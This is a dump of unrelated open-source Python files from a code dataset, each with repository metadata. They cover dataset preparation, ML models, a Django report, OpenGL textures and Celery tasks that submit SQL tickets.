\"train-index.txt\"), \"w\") as text_file:\n text_file.write(train_listing)\n\n test_index 
= 0\n test_listing = \"\"\n for (img, label) in zip([x for x in Xt], [l for l in yt]):\n fname = \"test-{}.png\".format(test_index)\n r = img[0].astype(np.uint8)\n g = img[1].astype(np.uint8)\n b = img[2].astype(np.uint8)\n output = cv2.merge((b, g, r))\n cv2.imwrite(os.path.join(cifar_caffe_directory, fname), output)\n test_listing += cifar_caffe_directory + \"/\" + fname + \" \" + str(label) + \"\\n\"\n test_index += 1\n\n with open(os.path.join(cifar_caffe_directory, \"test-index.txt\"), \"w\") as text_file:\n text_file.write(test_listing)\n\n with open(os.path.join(cifar_caffe_directory, \"labels.txt\"), \"w\") as text_file:\n text_file.write(\"\\n\".join(L['label_names']))\n\n print(\"Cleaning up...\")\n\n shutil.rmtree(cifar_python_directory)\n\n print(\"Done\")\n","repo_name":"kaveena/myopic-oracle","sub_path":"caffe-cifar-10-training/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30686137869","text":"from autoloader.rules.base import Rule\nfrom repository import Repository\n\nclass RepositoryRule(Rule):\n\n \"\"\"Class defining the autoloader rule to import repositories.\n\n The repositories are module containing a class. This class will be\n returned after importing the module. The repository should be\n saved in the bundle and will be used afterwards.\n\n \"\"\"\n\n def __init__(self, server):\n self.server = server\n\n @staticmethod\n def get_model_name(rep_class):\n \"\"\"Return the model's name defined in the class.\n\n If the 'model_name' class attribute is set, return it.\n Otherwise, return the class name.\n\n \"\"\"\n if hasattr(rep_class, \"model_name\"):\n return rep_class.model_name\n\n full_name = rep_class.__name__\n name = full_name.split(\".\")[-1]\n if name.endswith(\"Repository\"):\n name = name[:-10]\n\n return name\n\n def load(self, module):\n \"\"\"Load a specific module.\n\n This method:\n Get the Repository class defined in the module\n Write this class in the bundle's repositories\n Return the class\n\n \"\"\"\n name = Rule.module_name(module)\n bundle_name = Rule.bundle_name(module)\n bundle = self.server.bundles[bundle_name]\n rep_class = Rule.find_class(module, Repository)\n\n # Write the class in the bundles\n model_name = self.get_model_name(rep_class)\n bundle.repositories[model_name] = rep_class\n return rep_class\n","repo_name":"v-legoff/pa-poc3","sub_path":"src/autoloader/rules/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14253398625","text":"import gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nfrom data.config import CREDENTIALS_FILE, spreadsheet_id\n\nscopes = [\"https://spreadsheets.google.com/feeds\", \"https://www.googleapis.com/auth/drive\"]\ncredentials = ServiceAccountCredentials.from_json_keyfile_name(CREDENTIALS_FILE, scopes)\nclient = gspread.authorize(credentials)\n\nlocal = {}\n\n\nasync def get_local_data(sheet_name: str = spreadsheet_id):\n global local\n sheet = client.open_by_key(sheet_name).get_worksheet(0)\n langs = sheet.get_all_values()[0]\n data = sheet.get_all_values()[1:]\n for x in range(len(data)):\n valiable_name = data[x][0]\n append_data = {}\n for y in range(1, len(data[x])):\n append_data[langs[y]] = data[x][y]\n local[valiable_name] = 
append_data","repo_name":"gooodinho/J4U","sub_path":"data/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"25402560928","text":"import os\nimport datasets\nimport numpy as np\n\nfrom fewshot_gym_dataset import FewshotGymDataset, FewshotGymTextToTextDataset\nfrom utils import clean\n\nclass CommonsenseQA(FewshotGymTextToTextDataset):\n\n def __init__(self):\n self.hf_identifier = \"commonsense_qa\"\n self.task_type = \"text to text\"\n self.license = \"unknown\"\n\n def get_choices_and_answer_string(self, datapoint):\n answer_index = datapoint[\"answerKey\"]\n choices_string = \"\"\n for i in range(len(datapoint[\"choices\"][\"label\"])):\n if datapoint[\"choices\"][\"label\"][i] == answer_index:\n answer_string = datapoint[\"choices\"][\"text\"][i]\n choices_string += \" (\" + datapoint[\"choices\"][\"label\"][i] + \") \" + datapoint[\"choices\"][\"text\"][i]\n return choices_string, answer_string\n\n def map_hf_dataset_to_list(self, hf_dataset, split_name):\n lines = []\n for datapoint in hf_dataset[split_name]:\n choices_string, answer_string = self.get_choices_and_answer_string(datapoint)\n lines.append((clean(datapoint[\"question\"]) + choices_string, answer_string))\n return lines\n\n def load_dataset(self):\n return datasets.load_dataset(\"commonsense_qa\")\n\ndef main():\n dataset = CommonsenseQA()\n\n for seed in [100, 13, 21, 42, 87]:\n train, dev, test = dataset.generate_k_shot_data(k=32, seed=seed, path=\"../data/\")\n\ndef main_more_shots():\n dataset = CommonsenseQA()\n\n for shots in [64, 128, 256, 512, 1024, 2048, 4096]:\n for seed in [100, 13, 21, 42, 87]:\n train, dev, test = dataset.generate_k_shot_data(k=shots, seed=seed, path=\"../data_more_shots/{}_shot\".format(str(shots)))\n\nif __name__ == \"__main__\":\n main()\n # main_more_shots()","repo_name":"INK-USC/CrossFit","sub_path":"tasks/commonsense_qa.py","file_name":"commonsense_qa.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"27"} +{"seq_id":"3237138648","text":"\"\"\"Module for generating games by user report\"\"\"\nimport sqlite3\nfrom django.shortcuts import render\nfrom levelupapi.models import Game\nfrom levelupreports.views import Connection\n\n\ndef usergame_list(request):\n if request.method == 'GET':\n with sqlite3.connect(Connection.db_path) as conn:\n conn.row_factory = sqlite3.Row\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select g.id, g.name, g.maker,g.game_type_id,\n g.description,\n g.number_of_players,\n g.skill_level,\n u.id user_id,\n u.first_name || ' ' || u.last_name AS full_name\n from levelupapi_game g\n join levelupapi_gamer gr on g.gamer_id = gr.id\n join auth_user u on gr.user_id = u.id\n \"\"\")\n dataset = db_cursor.fetchall()\n\n games_by_user = {}\n\n for row in dataset:\n game = Game()\n game.name = row[\"name\"]\n game.maker = row[\"maker\"]\n game.skill_level = row[\"skill_level\"]\n game.number_of_players = row[\"number_of_players\"]\n game.game_type_id = row[\"game_type_id\"]\n game.description = row['description']\n\n uid = row['user_id']\n\n if uid in games_by_user:\n games_by_user[uid]['games'].append(game)\n else:\n games_by_user[uid] = {\n \"id\": uid,\n \"full_name\": row['full_name'],\n \"games\": [game]\n }\n list_of_users_with_games = games_by_user.values()\n\n template = 'users/list_with_games.html'\n context = {\n 
\"usergame_list\": list_of_users_with_games\n }\n\n return render(request, template, context)\n\n","repo_name":"nss-day-cohort-48/level-up-server","sub_path":"levelupreports/views/users/gamesbyuser.py","file_name":"gamesbyuser.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"2808637791","text":"\"csolid_hot.txt\"\nenergies = np.array([sec.potential_energy for sec in sections])\n\nprint(energies[0])\n\nX1 = groups[:,:,:3]/30\nX2 = groups[:,:,3:]/10\nY = energies / energies[0]\n\nX = (np.concatenate((X1, X2), axis=2))\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten\n\nmodel = Sequential()\nmodel.add(Flatten(input_shape=(172, 6)))\nmodel.add(Dense(2000, activation='sigmoid'))\nmodel.add(Dense(1, activation='sigmoid'))\nmodel.compile(optimizer='adam', loss='mean_squared_error')\n\nval_index = int(len(X) * 0.7)\n\nmodel.fit(X[:val_index], Y[:val_index], shuffle=True, validation_split=0.0)\n\nypred = (model.predict(X[val_index:]) * energies[0]).reshape((-1,))\nprint(ypred)\nytest = Y[val_index:]\n\nprint(np.corrcoef(ytest, ypred))","repo_name":"Sheyne/Topological-Chem","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42174832158","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Takes './www.wikidata.org/' and remove nodes that have only out-coming\n# instanceOf edges.\n#\n# Input: 53.208.214 Output: 1.534.909\n#\n\nimport json\nimport itertools\nimport time\n\n\ndef main():\n start = time.process_time()\n nodes_to_keep = set()\n\n directory = \"../data/www.wikidata.org/\"\n output_file_name = \"wikidata-hierarchy-reduced.trie.jsonl\"\n\n print(\"Searching for inner nodes and nodes with subclassOf edge ..\")\n counter = 0\n with open(directory + \"wikidata-hierarchy.jsonl\") as input_stream:\n for line in input_stream:\n content = json.loads(line)\n instance = content.get(\"instanceof\", [])\n subclass = content.get(\"subclassof\", [])\n # Keep all inner nodes.\n for node_id in itertools.chain(instance, subclass):\n nodes_to_keep.add(node_id)\n # Keep those with subclass edge.\n if subclass:\n nodes_to_keep.add(content[\"id\"])\n counter += 1\n if counter % 250000 == 0:\n print(\" \", counter)\n total_count = counter\n print(f'Finished in {int(time.process_time() - start)} s')\n\n print(\"Creating output ....\")\n counter = 0\n with open(directory + \"wikidata-hierarchy.jsonl\") as input_stream, \\\n open(directory + output_file_name, \"w\") as output_stream:\n for line in input_stream:\n content = json.loads(line)\n if content[\"id\"] not in nodes_to_keep:\n continue\n if \"instanceof\" in content:\n content[\"instanceof\"] = filter_array(\n nodes_to_keep, content[\"instanceof\"])\n if \"subclassof\" in content:\n content[\"subclassof\"] = filter_array(\n nodes_to_keep, content[\"subclassof\"])\n output_stream.write(json.dumps(content))\n output_stream.write(\"\\n\")\n counter += 1\n if counter % 250000 == 0:\n print(\" \", counter)\n\n print(f'Input: {total_count} Output: {len(nodes_to_keep)}')\n print(f'Finished in {int(time.process_time() - start)} s')\n\n\ndef filter_array(items_to_keep, items):\n return [item for item in items if item in items_to_keep]\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"mff-uk/open-dataset-inspector","sub_path":"data-preparation/run_remove_instances.py","file_name":"run_remove_instances.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72099924553","text":"import gym\nimport numpy as np\nimport pandas as pd\nimport os\n\nfrom gym import wrappers\nfrom datetime import datetime\n\nfrom rl_gym.models.linear_models import RbfRegressor\nfrom rl_gym.models.mlp_models import FeedForwardModel\nfrom rl_gym.agents.qlearning_agent import QLearningFunctionAproximationAgent\n\nimport matplotlib.pyplot as plt\n\ndef create_model(env, model_name, verbose=False):\n obs = env.reset()\n obs_dim = len(obs)\n if model_name == 'rbf':\n observation_examples = np.array([env.observation_space.sample() for x in range(10000)])\n model = RbfRegressor(in_size=obs_dim, num_features=500, output_size=env.action_space.n, gammmas=[5.0, 2.0, 1.0, 0.5], verbose=verbose)\n model.fit_features(observation_examples, env)\n gamma = 0.99\n elif model_name == 'ff':\n observation_examples = np.array([env.observation_space.sample() for x in range(10000)])\n model = FeedForwardModel(in_size=obs_dim, out_sizes=[128, 64, 32, env.action_space.n], normalize=False, verbose=verbose)\n model.fit_features(observation_examples)\n gamma = 0.99\n\n return model, gamma\n\ndef set_monitor(env):\n filename = os.path.basename(__file__).split('.')[0]\n monitor_dir = filename + '_' + str(datetime.now()).replace(' ', '_').replace(':', '_')\n monitor_dir = os.path.join(monitor_dir, os.pardir, os.pardir, os.pardir, 'temp')\n # return the wrapped environment so the monitor actually takes effect\n env = wrappers.Monitor(env, monitor_dir, force=True)\n return env\n\nnp.random.seed(0)\nif __name__ == '__main__':\n env = gym.make('MountainCar-v0')\n env.seed(0)\n verbose = False\n models = ['rbf', 'ff']\n model, gamma = create_model(env, models[0], verbose=verbose)\n agent = QLearningFunctionAproximationAgent(model=model, eps=0.0, eps_decay=0.99, gamma=gamma, verbose=verbose)\n\n monitor = True\n if monitor:\n env = set_monitor(env)\n\n num_iter = 40\n total_steps = 0\n returns = []\n for i in range(num_iter):\n print(\"Epoch %d\" % i)\n # if i == 23:\n # agent.verbose = True\n # else:\n # agent.verbose = False\n steps, tot_ret, last_reward = agent.single_episode_train(env)\n total_steps += steps\n returns.append(tot_ret)\n # if i > 0 and (i % 50 == 0):\n # model.adjust()\n print('Episode finished in %d steps. Return %f.' 
% (steps, tot_ret))\n\n env.close()\n\n cum_returns = (pd.DataFrame(returns, columns=['r'])).r.rolling(window=100).mean()\n\n print(\"Last 100 episode average reward %f\" % np.mean(returns[-100:]))\n\n fig, ax = plt.subplots()\n ax.plot(returns, label='Returns')\n ax.plot(cum_returns, label='Cumulative return')\n\n plt.show()\n print('Done')","repo_name":"ynahshan/deep_rl_experiments","sub_path":"rl_gym/experiments/mountain_car.py","file_name":"mountain_car.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"26598187994","text":"import io\nimport os\nimport sys\nimport pkgutil\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\n\n\ndef init():\n \"\"\"Set relevant OpenGL options\"\"\"\n # fill default texture with white\n glBindTexture(GL_TEXTURE_2D, 0)\n glTexImage2D(\n GL_TEXTURE_2D, 0, GL_RGBA, 1, 1, 0, GL_RGBA, GL_FLOAT,\n [1., 1., 1., 1.] # opaque white pixel\n )\n\n\ntry:\n from PIL import Image\nexcept ImportError:\n print(\"Install python3-pil for textures\", file=sys.stderr)\n\n def load(*_, **__):\n \"\"\"No texture can be loaded with PIL; return dummy texture 0\"\"\"\n return 0\n\n def load_cubemap(*path):\n return 0\nelse:\n def load_image(*path):\n \"\"\"Return raw picels from file at given path (join arguments)\"\"\"\n filename = os.path.join(\"data\", \"textures\", *path)\n try:\n image = pkgutil.get_data(\"gspyce\", filename)\n except FileNotFoundError:\n print(\"Missing %s\" % filename, file=sys.stderr)\n return None, None, None\n\n im = Image.open(io.BytesIO(image))\n w, h = im.size\n # \n # orientation=-1 ⇒ first row at bottom (as OpenGL expects)\n data = im.convert(\"RGBA\").tobytes(\"raw\", \"RGBA\", 0, -1)\n return w, h, data\n\n def load(*path):\n \"\"\"Make texture from file at given path (join arguments)\n\n If loading the file fails, return dummy texture 0\"\"\"\n w, h, data = load_image(*path)\n if data is None:\n return 0\n\n new_tex = glGenTextures(1)\n glBindTexture(GL_TEXTURE_2D, new_tex)\n glTexImage2D(\n GL_TEXTURE_2D, 0, GL_RGBA, w, h, 0, GL_RGBA, GL_UNSIGNED_BYTE, data\n )\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glBindTexture(GL_TEXTURE_2D, 0)\n\n return new_tex\n\n def load_cubemap(*path):\n \"\"\"Create a cubemap\n\n Arguments are joined together to make the paths to the textures. 
Last\n argument should be a pattern with a \"%s\", which will be completed as\n \"PositiveX\", \"NegativeY\" and so on.\"\"\"\n\n texture = glGenTextures(1)\n glBindTexture(GL_TEXTURE_CUBE_MAP, texture)\n path, file_pattern = list(path[:-1]), path[-1]\n faces = [\"PositiveX\", \"NegativeX\",\n \"PositiveY\", \"NegativeY\",\n \"PositiveZ\", \"NegativeZ\"]\n for i, face in enumerate(faces):\n full_path = path + [file_pattern % face]\n w, h, data = load_image(*full_path)\n if data is None:\n continue\n glTexImage2D(\n GL_TEXTURE_CUBE_MAP_POSITIVE_X + i,\n 0, GL_RGBA, w, h, 0, GL_RGBA, GL_UNSIGNED_BYTE, data\n )\n glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n glTexParameteri(GL_TEXTURE_CUBE_MAP, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glBindTexture(GL_TEXTURE_CUBE_MAP, 0)\n\n return texture\n","repo_name":"qsantos/spyce","sub_path":"gspyce/textures.py","file_name":"textures.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"27"} +{"seq_id":"27961509685","text":"import argparse\nimport json\nfrom pathlib import Path\nfrom typing import Iterable, Union\n\nimport numpy as np\n\n\ndef summarize_trials(output_dir: Union[Path, str]) -> dict:\n result_paths = list(Path(output_dir).glob('*/result.json'))\n if not result_paths:\n print(f'unable to find any completed trial under {output_dir}')\n return\n divs = np.zeros(len(result_paths), dtype=np.float32)\n cors = np.zeros(len(result_paths), dtype=np.float32)\n for i, result_path in enumerate(result_paths):\n with result_path.open('r') as f:\n result = json.load(f)\n divs[i] = result['div']\n cors[i] = result['cor']\n print(f'Summary for trials under {output_dir}')\n print(f'Result averaged over {len(result_paths)} trial(s):')\n print(f'div: {divs.mean():.4f} +/- {divs.std():.4f}')\n print(f'cor: {cors.mean():.4f} +/- {cors.std():.4f}')\n summary = {\n 'completed_trials': [path.parent.name for path in result_paths],\n 'result': {\n 'div': {'mean': float(divs.mean()), 'std': float(divs.std())},\n 'cor': {'mean': float(cors.mean()), 'std': float(cors.std())},\n }\n }\n with Path(output_dir, 'summary.json').open('w') as f:\n json.dump(summary, f)\n return summary\n\n\ndef summarize_sets(output_dirs: Iterable[Union[Path, str]]) -> dict:\n div_avgs, cor_avgs = [], []\n div_stds, cor_stds = [], []\n n_trials = []\n summaries = {}\n for output_dir in output_dirs:\n summary = summarize_trials(output_dir)\n if summary is None:\n continue\n div_avgs.append(summary['result']['div']['mean'])\n cor_avgs.append(summary['result']['cor']['mean'])\n div_stds.append(summary['result']['div']['std'])\n cor_stds.append(summary['result']['cor']['std'])\n n_trials.append(len(summary['completed_trials']))\n summaries[output_dir] = summary\n div_avgs, cor_avgs = map(np.array, (div_avgs, cor_avgs))\n div_stds, cor_stds = map(np.array, (div_stds, cor_stds))\n n_trials = np.array(n_trials)\n avg_div_std = sum(div_stds * n_trials / sum(n_trials))\n avg_cor_std = sum(cor_stds * n_trials / sum(n_trials))\n print(f'Overall statistics of {len(summaries)} sets of trials:')\n print(f'set-average div: {div_avgs.mean():.4f} +/- ({avg_div_std:.4f})')\n print(f'set-average cor: {cor_avgs.mean():.4f} +/- ({avg_cor_std:.4f})')\n return summaries\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--output_dirs', type=str, nargs='+', required=True)\n args = parser.parse_args()\n if len(args.output_dirs) == 1:\n 
summarize_trials(args.output_dirs[0])\n else:\n summarize_sets(args.output_dirs)","repo_name":"m-Just/OoD-Bench","sub_path":"ood_bench/scripts/summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"27"} +{"seq_id":"71864162313","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\n\nclass CNN_Text(nn.Module):\n def __init__(self, args, tokenizer, num_labels):\n super().__init__()\n self.args = args\n self.class_num = num_labels\n self.kernel_num = args.kernel_num\n if isinstance(args.kernel_sizes, list):\n self.kernel_sizes = args.kernel_sizes # list of kernel sizes\n else: \n self.kernel_sizes = [int(x) for x in args.kernel_sizes.split(',')] \n self.in_channels = 1\n self.metric_fc_dim = 50\n\n # Load pre-trained embedding\n self.embed = nn.Embedding.from_pretrained(torch.from_numpy(tokenizer.embs_npa).float(), \n padding_idx=tokenizer.pad_token_id, freeze=False) \n\n self.convs = nn.ModuleList(\n [nn.Conv2d(self.in_channels, self.kernel_num, (K, tokenizer.embs_npa.shape[1])) for K in self.kernel_sizes]\n )\n '''\n self.conv13 = nn.Conv2d(Ci, Co, (3, D))\n self.conv14 = nn.Conv2d(Ci, Co, (4, D))\n self.conv15 = nn.Conv2d(Ci, Co, (5, D))\n '''\n self.dropout = nn.Dropout(args.dropout)\n self.fc = nn.Linear(len(self.kernel_sizes) * self.kernel_num, self.class_num)\n\n if args.ensemble:\n self.embed2 = nn.Embedding.from_pretrained(torch.from_numpy(tokenizer.embs_npa).float(), \n padding_idx=tokenizer.pad_token_id, freeze=False) \n\n self.convs2 = nn.ModuleList(\n [nn.Conv2d(self.in_channels, self.kernel_num, (K, tokenizer.embs_npa.shape[1])) for K in self.kernel_sizes]\n )\n self.dropout2 = nn.Dropout(args.dropout)\n self.fc2 = nn.Linear(len(self.kernel_sizes) * self.kernel_num, self.class_num)\n\n\n def conv_and_pool(self, x, conv):\n x = F.relu(conv(x)).squeeze(3) # (N, Co, W)\n x = F.max_pool1d(x, x.size(2)).squeeze(2)\n return x\n\n def forward(self, x):\n x1 = self.embed(x) # (N, W, D)\n if self.args.static:\n x1 = Variable(x1)\n\n x1 = x1.unsqueeze(1) # (N, Ci, W, D)\n x1 = [F.relu(conv(x1)).squeeze(3) for conv in self.convs] # [(N, Co, W), ...]*len(Ks)\n x1 = [F.max_pool1d(i, i.size(2)).squeeze(2) for i in x1] # [(N, Co), ...]*len(Ks)\n x1 = torch.cat(x1, 1) # (N, len(Ks)*Co)\n x1 = self.dropout(x1) # (B, len(Ks)*Co)\n logit1 = self.fc(x1) # (B, V)\n\n if self.args.ensemble:\n x2 = self.embed2(x) # (N, W, D)\n if self.args.static:\n x2 = Variable(x2)\n\n x2 = x2.unsqueeze(1) # (N, Ci, W, D)\n x2 = [F.relu(conv(x2)).squeeze(3) for conv in self.convs2] # [(N, Co, W), ...]*len(Ks)\n x2 = [F.max_pool1d(i, i.size(2)).squeeze(2) for i in x2] # [(N, Co), ...]*len(Ks)\n x2 = torch.cat(x2, 1) # (N, len(Ks)*Co)\n x2 = self.dropout2(x2) # (B, len(Ks)*Co)\n logit2 = self.fc2(x2) # (B, V)\n\n return x1, logit1, x2, logit2 \n \n return x1, logit1","repo_name":"yul091/UncertaintyNLP","sub_path":"CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"3690852697","text":"from celery import shared_task\nfrom datetime import timedelta\nimport json\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom cicdflow.models import CICDState\nfrom cicdflow.views import d_logger\nfrom util.archery_operate import ArcheryAPI, archery_config\nfrom util.svn_client import SvnClient\nfrom 
util.redis_client import RedisClient\n\n\"\"\"\"\n定时获取所有 SQL 状态 2 & 3 的工作流\n 状态为3时:提交 SQL 工单到 Archery,待 DBA 审核执行,并将状态置为2\n 状态为2时:调用 Archery 接口获取 SQL 工单执行结果\n -> 成功置为0\n -> 失败置为1\n 状态为0/1/9时:忽略/发出通知?\n\"\"\"\n@shared_task\ndef sqlstate_task() -> None:\n # 初始化实例\n redis_client = RedisClient().redis_client\n archery_api = ArcheryAPI()\n schema = archery_config['schema']\n\n # 获取当前 sql_state 为 3 的待执行工作流,轮训每个工作流提交 SQL 工单\n waiting_execute = CICDState.objects.filter(flow_state=3, sql_state=3)\n for i in range(len(waiting_execute)):\n try:\n we_ins = waiting_execute.get(id=waiting_execute.values()[i]['id'])\n # 已邮件标题作为 key 唯一值,每个 value 为 dict ,key 为 workflow_name 唯一值\n email_title = we_ins.email_title.email_title\n # 不存在 redis key,首次提交 SQL 工单\n # 失败工单存入 redis 队列,重复执行时只继续提交失败工单,直到所有工单成功将 sql_state 置为 2\n if not redis_client.llen(email_title):\n # 获取提交 SQL 工单所需参数\n archery_data_list = []\n run_date_start = we_ins.update_date.strftime('%Y-%m-%dT%H:%M:%S')\n run_date_end = (we_ins.update_date + timedelta(days=3)).strftime('%Y-%m-%dT%H:%M:%S')\n sql_info_list = we_ins.email_title.sql_info\n for sql_info in sql_info_list:\n svn_path = sql_info['svn_path'].replace('10.138.200.100', '172.20.5.112')\n svn_sub_path = svn_path.split('/')[-1]\n svn_version = sql_info['svn_version']\n svn_file_name = sql_info['svn_file']\n\n workflow_name = f\"{email_title}-{svn_version}-{svn_file_name.split('.')[0]}\"\n # 根据 svn 路径判断是否提交工单,只提交当前 Archery 已有的 DB 实例\n try:\n schema_info = schema[svn_sub_path]\n group_id = schema_info['group_id']\n instance_id = schema_info['instance_id']\n db_name = schema_info['db_name']\n except KeyError:\n d_logger.info(f\"升级邮件: <{email_title}> ,SQL 工单:{workflow_name} DB 不存在于当前 Archery 已有实例,库名:<{svn_sub_path}>\")\n continue\n svn_obj = SvnClient(svn_path)\n sql_content_value = svn_obj.get_file_content(revision=svn_version, filename=svn_file_name)\n tmp_data = (workflow_name, group_id, instance_id, db_name, sql_content_value)\n archery_data_list.append(tmp_data)\n\n # 调用 ArcheryAPI 实例方法,提交 SQL 工单\n assert archery_data_list, f\"升级邮件: <{email_title}> 所有 SQL DB 都不存在于当前 Archery 已有实例,不提交 Archery,人工处理 SQL\"\n for archery_data in archery_data_list:\n workflow_data = {\n 'workflow_name': archery_data[0],\n 'demand_url': archery_data[0],\n 'group_id': archery_data[1],\n 'instance_id': archery_data[2],\n 'db_name': archery_data[3],\n 'run_date_start': run_date_start,\n 'run_date_end': run_date_end,\n 'sql_content': archery_data[4]\n }\n submit_result = archery_api.submit_sql_ticket(**workflow_data)\n # 提交失败的 SQL 工单存入 redis 队列\n if not submit_result['code']:\n print(f\"升级邮件: <{email_title}> ,SQL 工单:{workflow_name} 提交成功。响应消息:{submit_result['msg']}\")\n else:\n print(f\"升级邮件: <{email_title}> ,SQL 工单:{workflow_name} 提交失败。响应消息:{submit_result['msg']}\")\n redis_client.rpush(email_title, json.dumps(workflow_data))\n # redis 队列为空,所有待执行 SQL 工单都提交成功,sql_state 状态置为2\n if not redis_client.llen(email_title):\n redis_client.delete(email_title)\n we_ins.sql_state = 2\n we_ins.save()\n # 存在 redis key,有失败 SQL 工单。获取 redis 队列中所有元素重新提交,提交成功删除队列数据,提交失败将数据放回队列待下次定时任务执行\n else:\n for i in range(redis_client.llen(email_title)):\n # 重复提交失败的 SQL 工单,如提交成功从队列移除,提交失败重新放回队列尾部\n workflow_data = redis_client.lpop(email_title)\n submit_result = archery_api.submit_sql_ticket(**json.loads(workflow_data))\n if not submit_result['code']:\n print(f\"升级邮件: <{email_title}> ,SQL 工单: <{submit_result['workflow_name']}> 提交成功。响应消息:{submit_result['msg']}\")\n else:\n print(f\"升级邮件: <{email_title}> ,SQL 工单: <{submit_result['workflow_name']}> 
提交失败。响应消息:{submit_result['msg']}\")\n redis_client.rpush(email_title, workflow_data)\n if not redis_client.llen(email_title):\n redis_client.delete(email_title)\n we_ins.sql_state = 2\n we_ins.save()\n except AssertionError as err:\n we_ins.sql_state = 1\n we_ins.save()\n d_logger.error(err.__str__())\n except ObjectDoesNotExist:\n msg = f'当前升级邮件没有待执行 SQL 工单(sql_state=3),忽略本次任务'\n d_logger.info(msg)\n except Exception as err:\n msg = f'当前升级邮件待执行 SQL 工单: <{email_title}> 提交失败或异常,异常信息:{err.__str__()}'\n d_logger.info(msg)\n # 执行中 SQL 工单,调用 Archery 接口获取工单执行结果\n # in_progress = CICDState.objects.filter(flow_state=3, sql_state=2)\n # for i in range(len(in_progress)):\n # try:\n # ip_ins = in_progress.get(id=in_progress.values()[i]['id'])\n # # TODO: 获取状态更新 sql_state,发送邮件\n # print('执行中 SQL 工单....')\n # except ObjectDoesNotExist:\n # print('当前没有执行中 SQL 工单(sql_state=2),忽略本次任务')\n # except Exception as err:\n # print(f'执行中 SQL 工单获取状态失败或异常,异常信息:{err.__str__()}')\n\n# 定时获取所有代码为待执行状态的工作流,提交到 CMDB 升级代码(过滤 SQL、config、Apollo 都已执行成功的工作流才执行此任务)\n# @shared_task\n# TODO: 定时任务升级代码功能\n# def projectstate_task() -> None:\n# try:\n# cicdflow_state = CICDState.objects.filter(flow_state=3, project_state=3, sql_state=0, config_state=0, apollo_state=0)\n# print(cicdflow_state)\n# d_logger.info(cicdflow_state)\n# except CICDState.DoesNotExist:\n# d_logger.info('当前没有需执行代码升级邮件,忽略本次任务....')\n# except Exception as err:\n# print(f'task error: {err}')\n# return None\n\"\"\"\nDear All:\n\n1、升级开始时间:2023年01月30日 16:40\n2、升级完成时间:2023年01月30日 17:06\n3、升级人:SAD\n4、以下内容已经升级完成:\n \nUAT_A18_KRATOS_FRONTEND_V3\n \n5、预计升级运营 12 ~ 20 分钟。\n\"\"\"","repo_name":"yakir3/devops_tools","sub_path":"cicdflow/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":8294,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21661610201","text":"from collections import Counter\nfrom itertools import count\n\na = Counter('welcome to python')\nc = a.most_common(2)\nd = list(a.elements())\nprint(d)\n\nprint(c)\n\n'''for i,J in a.items():\n if J > 1 :\n print(i)'''\n\n\n\n \n","repo_name":"vemsekhar/pyselenium","sub_path":"practice/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22387323867","text":"import os\nimport sys\nimport subprocess\nimport argparse\nimport json\nimport numpy as np\nfrom numpy import genfromtxt\nfrom matplotlib import pyplot as plt\nimport pprint\npprint = pprint.pprint\n\n\nLOAD_DIR = \"/app/pyhanabi/wandb_data\"\nSPLIT_NAME = {\n \"six\": \"6-7 Splits\", \n \"one\": \"1-12 Splits\", \n \"eleven\": \"11-2 Splits\"\n}\n\n\ndef plot_mean_logs(args):\n model_names = get_names(args)\n pprint(model_names)\n\n data = load_data(args, model_names)\n\n plot_data(args, data)\n\n\ndef get_names(args):\n split_ids = parse_number_list(args.splits)\n splits_file = f\"train_test_splits/sad_splits_{args.split_type}.json\"\n splits = load_json_list(splits_file)\n\n model_names = []\n\n for split_i in split_ids:\n indexes = splits[split_i][\"train\"]\n indexes = [x + 1 for x in indexes]\n idx_str = '_'.join(str(x) for x in indexes)\n\n name = 